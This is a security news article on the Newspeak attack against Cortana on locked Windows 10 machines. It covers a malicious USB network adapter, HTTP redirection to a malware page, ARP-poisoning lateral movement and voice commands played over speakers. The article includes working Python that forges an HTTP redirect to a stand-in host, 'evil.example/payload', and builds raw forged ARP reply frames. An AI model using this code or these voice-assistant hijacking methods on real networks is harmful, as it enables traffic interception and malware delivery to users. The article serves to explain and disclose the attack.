The discovery was made by Tal Be’ery and Amichai Shulman, and a successful attack demonstrated in these videos:
This attack requires the attacker to have physical access to the target computer so that they can plug a malicious network adapter into the locked machine’s USB port. The next step is to hail Cortana and instruct it to visit a non-HTTPS site. (In Windows 10, Cortana responds by default to any voice; making it respond only to the owner’s voice requires a short “training” session.)
The malicious adapter intercepts the plaintext web session, so the attacker can modify it and send the computer a reply redirecting it to another site, one that has been booby-trapped to deliver malware to visitors.
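In essence, the rogue adapter acts as a man-in-the-middle on the unencrypted HTTP session: instead of forwarding the legitimate server’s response, it answers with a redirect to a page the attacker controls. A minimal sketch of what such a forged response could look like (the host `evil.example` is a hypothetical placeholder, not from the research):

```python
# Sketch: forge an HTTP 302 redirect that a man-in-the-middle device
# could return in place of the real server's response on a plaintext
# HTTP session. "evil.example" is a made-up attacker-controlled host.

def forge_redirect(location: str) -> bytes:
    """Build a minimal HTTP/1.1 302 response pointing at `location`."""
    body = b"<html><body>Moved</body></html>"
    headers = (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return headers.encode("ascii") + body

response = forge_redirect("http://evil.example/payload")
print(response.decode("ascii").splitlines()[0])  # HTTP/1.1 302 Found
```

Because the original request went out over plain HTTP, nothing authenticates the response, which is exactly why forcing Cortana onto a non-HTTPS site matters.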
If, for example, the first computer is made to download malware that performs ARP poisoning, it can force the other computers on the local network to route all their traffic through it.
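ARP poisoning works by broadcasting forged ARP replies that bind the gateway’s IP address to the attacker’s MAC address; neighboring machines update their ARP caches and start sending gateway-bound traffic to the attacker. A rough sketch of what such a forged reply frame looks like on the wire (all MAC and IP addresses below are made-up examples):

```python
import socket
import struct

def forge_arp_reply(attacker_mac: bytes, victim_mac: bytes,
                    gateway_ip: str, victim_ip: str) -> bytes:
    """Build a raw Ethernet frame carrying a forged ARP reply that
    claims the gateway's IP address lives at the attacker's MAC."""
    # Ethernet header: destination MAC, source MAC, EtherType 0x0806 (ARP)
    eth_header = victim_mac + attacker_mac + b"\x08\x06"
    arp_payload = struct.pack(
        "!HHBBH6s4s6s4s",
        1,        # hardware type: Ethernet
        0x0800,   # protocol type: IPv4
        6, 4,     # hardware / protocol address lengths
        2,        # opcode 2 = ARP reply
        attacker_mac, socket.inet_aton(gateway_ip),  # "sender": gateway IP, attacker MAC
        victim_mac,   socket.inet_aton(victim_ip),   # target: the victim
    )
    return eth_header + arp_payload

frame = forge_arp_reply(b"\xaa" * 6, b"\xbb" * 6, "192.168.1.1", "192.168.1.23")
print(len(frame))  # 42-byte Ethernet + ARP frame
```

Sending such frames repeatedly keeps the victims’ ARP caches poisoned, which is what lets the compromised machine intercept its neighbors’ sessions the same way the USB adapter intercepted the first one.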
If equipped with the Newspeak proxy – a tool created by the researchers that monitors all Cortana requests and responses on every machine on a network – the attacker can, as before, intercept and redirect this traffic to send those computers to malicious pages.
And, if waiting for users to use Cortana seems like too much trouble, the attacker can force nearby machines to start a Cortana session by simply playing the instructions over the compromised computer’s speakers. If done at night, when offices are empty, this lateral movement could easily go undetected.
What will the future bring?
The researchers shared their discovery with Microsoft, and the company responded by forcing Cortana-initiated browsing from locked machines to point to the Bing search engine, which is HTTPS-protected by default.
While this means that this particular attack is thwarted, new attacks could be discovered as Cortana still responds to other commands when the machine is locked.
Voice-controlled user interfaces have gained popularity in the last few years, especially on mobile phones and smart devices: Apple has Siri, Amazon has Alexa, and Google has Google Assistant.
Instances of voice-activated smart assistants doing someone else’s bidding have become par for the course, and other researchers have already devised covert attacks taking advantage of the fact that these assistants can hear (and obey) commands in ultrasonic frequencies.